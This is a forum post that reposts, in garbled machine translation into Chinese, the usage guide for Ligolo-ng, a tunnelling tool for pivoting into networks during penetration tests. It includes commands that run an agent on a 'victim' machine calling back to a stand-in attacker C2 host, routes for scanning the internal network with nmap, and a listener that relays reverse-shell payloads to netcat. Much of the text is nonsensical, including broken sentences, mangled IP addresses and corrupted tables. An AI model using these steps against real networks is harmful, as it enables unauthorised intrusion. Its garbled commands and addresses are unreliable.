taibeihacker
Moderator
Ligolo-ng是一种简单,轻巧且快速的工具,允许penters使用tun interface(无需袜子)从反向TCP/TLS连接从反向TCP/TLS连接建立隧道。
Features
Tun interface(不再使用袜子!),具有代理选择和网络信息易于使用的简单UI,并易于使用和设置自动证书配置,让我们加密性能(多重)不需要高度特权套接字套接字套接字套接字插座套接字插件在代理上为代理多个平台上支持的代理How is this different from Ligolo/Chisel/Meterpreter... ?
-000-tc-tcs prom tc/tc/tc/tcs prexs prom s prog/tc/tcs prexs prom ud tc/tcs prexs prom s prom ud tc/tcs prom un s prom usy usy usy un使用GVISOR创建一个Userland网络堆栈。运行继电器/代理服务器时,使用Ligolo-ng接口,发送到该接口的数据包被翻译到该接口,然后将其发送到代理远程网络。
例如,对于TCP Connection:
如果Connect(Connect()成功的RST发送,则将SYN转换为远程Syn-Ack上的Connect(),如果Econnreset,Econnaborted或Econnrefused Syscall将在连接后返回Connect,则将返回Connect nonge Nothing nonge Nothing nonge,如果不使用ProxyChains(简单且更快),则该连接不得发送。
Building Usage
Precompiled binaries
在发布页面上可用。Building Ligolo-ng
建筑物Ligolo-ng(需要GO=1.20):$ go build -o代理CMD/agent/main.go
$ GO BUILD -O代理CMD/代理/Main.go
#为Windows构建
$ Goos=Windows Go Build -o Agent.exe CMD/agent/main.go
$ Goos=Windows Go Build -o Proxy.exe CMD/proxy/main.go
Setup Ligolo-ng
Linux
当使用Linux时,您需要在代理服务器(C2):上创建TUN界面$ sudo ip tuntap添加用户[your_username]模式tun ligolo
$ sudo ip链接集ligolo UP
Windows
您需要下载Wintun驱动程序(由Wineguard使用),然后将wintun.dll放在与Ligolo同一文件夹中(确保使用正确的体系结构)。Running Ligolo-ng proxy server
在您的命令和控件(C2)服务器(默认端口11601):上启动代理服务器$ ./proxy -h#帮助选项
$ ./proxy -autocert#自动请求LetSencrypt证书
TLS Options
Using Let's Encrypt Autocert
当使用-autocert选项时,代理将自动向Attracter_c2_server.com请自动请求证书(使用Let's Encrypt),何时连接代理时。我们需要访问80的端口,让我们加密证书验证/检索
Using your own TLS certificates
如果要为代理服务器使用自己的证书,则可以使用-certfile和-keyfile参数。Automatic self-signed certificates (NOT RECOMMENDED)
代理/继电器可以使用-SelfCert选项自动生成自签名的TLS证书。代理需要使用-ignore -cert选项。
当心中间攻击!此选项仅应在测试环境或调试目的中使用。
Using Ligolo-ng
在您的目标(受害者)计算机上启动代理(无需特权!):$ ./agent -connect Attacker_c2_server.com:11601如果要通过Socks5代理进行连接隧道,则可以使用-socks ip

会话应显示在代理服务器上。
信息[0102]代理加入。名称=nchatelain@nworkStation远程='xx.xx.xx.xx:38000'使用session命令选择代理。
Ligolo-ng»会话
?指定会话: 1 -NCHATELAIN@nworkStation -xx.xx.xx.xx.xx.xx:38000使用IFCONFIG命令:显示代理的网络配置
[代理: nchatelain@nworkStation]»ifconfig
[.]
┌┌前往┌┌前往┌┌┌届┌前往┌┌前往┌┌前往┌前─-─- - ─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─- - ─-─- - ─-─-─- - ─
│接口3│
├├前往├├前往├├├届├├├├前世- 前往─-─- - ─-─-─-─-─-─-─-─-─-─-─-─-─-─-─-─- - ─-─- - ─- - ─-─-┤
│名称│wlp3s0│
│硬件Mac│DE:AD:BE:EF:CA:FE│
│mtu│1500│
│旗│升|广播|多播│
│IPv4地址│192.168.0.30/24│
└└前往└└└└└└届└└└└前世- 前─-─┴前往前─-─-─达队─.─-─达队- ─-─-─-─-─达克/─-─-─-─-─-上空/继电器服务器在192.168.0.0.0.0.0/24 agent网络上添加了一条路线。
Linux:
$ sudo ip路由添加192.168.0.0/24 dev ligolo windows:
netsh int ipv4显示接口
idxmétmtuétatnom
---------------------------------------------------------------------------------------------
25 5 65535连接的Ligolo
路由添加192.168.0.0蒙版255.255.255.0 0.0.0.0如果[接口IDX]在Proxy:上启动隧道
[代理: nchatelain@nworkstation]»开始
[代理: NCHATELAIN@nworkStation]»INFO [0690]启动隧道到NCHATELAIN@nworkStation,您现在可以从代理服务器访问192.168.0.0/24代理网络。
$ NMAP 192.168.0.0.0/24 -V -SV -N
[.]
$ rdesktop 192.168.0.123
[.]
Agent Binding/Listening
您可以收听代理上的端口,并将连接重定向到您的控件/代理服务器。在Ligolo会话中,使用listerer_add命令。
下面的示例将在代理(0.0.0.0.033601234)上创建一个TCP侦听套接字,并将连接重定向到代理服务器的4321端口。
[代理: NCHATELAIN@nworkStation]»Luctiler_Add -Addr 0.0.0.0.0.0:1234 - 至127.0.0.0.0.1:4321 -TCP
信息[1208]在远程代理上创建的侦听器!在代理:上
$ NC -LVP 4321在代理的TCP端口1234上建立连接时,NC将接收连接。
当使用反向TCP/UDP有效载荷时,这非常有用。
您可以使用listerer_list命令查看当前运行的侦听器,并使用listerer_stop [id] command:停止他们
[代理: nchatelain@nworkStation]»侦听器_list
┌┌┌氨- ─-─-─-─-──达c - ─达c至─达c - ──达c至─达教前培训
│主动听众│
├├├氨- - - - - - 流行- 至─达c - ─达c - −流行- ─-─────达教育期- ─杏仁- ─-─-─-─-美回递助- ─杏仁- ─-─-─-─-─-─-─-─-─-─-上返- - ─-─氨- ─杏仁- ─- - ─-─- - ─-─-─-─-─-─-─-─-─- - 亩橙- ─-─-─.-─.- - ─.-─.- - 美,之一
│#│代理│代理侦听器地址│代理重定向地址│
├ - ├├届├├├邮编- ─- - - −流足- 至─达c至─达c-─达c至氨- ┼杏石─.-─美郎───杏仁- ──杏仁- ─-─-─-─-─-美回- 达c至- −流园- ─-─-─杏仁- 上返
│0│nworkstation@nworkStation│0.0.0.0.0:1234│127.0.0.0.1:4321│
└└└氨- - - - - 流行至期至期至期至期至美,达教前培训
[代理: nchatelain@nworkStation]»侦听器_STOP 0
信息[1505]侦听器关闭。
Demo
ligolo-ng_demo.mp4Does it require Administrator/root access ?
在代理方面,不!一切都可以执行,无需管理访问。但是,在继电器/代理服务器上,您需要能够创建一个TUN界面。
Supported protocols/packets
TCP UDP ICMP(回声请求)Performance
您可以轻松地击中100 mbits/sec。这是使用IPERF从200MBITS/S服务器到200MBITS/S连接的测试。$ iperf3 -c 10.10.0.1 -p 24483
连接到主机10.10.0.1,端口24483
[5]本地10.10.0.224端口50654连接到10.10.0.1端口24483
[id]间隔转移比特率reter cwnd
[5] 0.00-1.00 Sec 12.5 Mbytes 105 Mbits/sec 0 164 KBYTES
[5] 1.00-2.00 SEC 12.7 MBYTES 107 MBITS/SEC 0 263 KBYTES
[5] 2.00-3.00秒12.4 mbytes 104 mbits/sec 0 263 kbytes
[5] 3.00-4.00 SEC 12.7 MBYTES 106 MBITS/SEC 0 263 KBYTES
[5] 4.00-5.00 Sec 13.1 Mbytes 110 mbits/sec 2 134 kbytes
[5] 5.00-6.00 Sec 13.4 Mbytes 113 mbits/sec 0 147 kbytes
[5] 6.00-7.00 Sec 12.6 Mbytes 105 mbits/sec 0 158 kbytes
[5] 7.00-8.00 SEC 12.1 MBYTES 101 MBITS/SEC 0 173 KBYTES
[5] 8。00-9.00 SEC 12.7 MBYTES 106 MBITS/SEC 0 182 KBYTES
[5] 9.00-10.00 SEC 12.6 MBYTES 106 MBITS/SEC 0 188 KBYTES
-----------------------------------------------------------------------------------------------------
[id]间隔转移比特率retor
[5] 0.00-10.00 SEC 127 MBYTES 106 MBITS/SEC 2发件人
[5] 0.00-10.08 SEC 125 MBYTES 104 MBITS/sec接收器
Caveats
由于代理人在没有特权的情况下运行,因此无法转发原始数据包。执行NMAP SYN-SCAN时,将在代理商上执行TCP Connect()。使用NMAP时,您应该使用-unprivileged或-pe避免误报。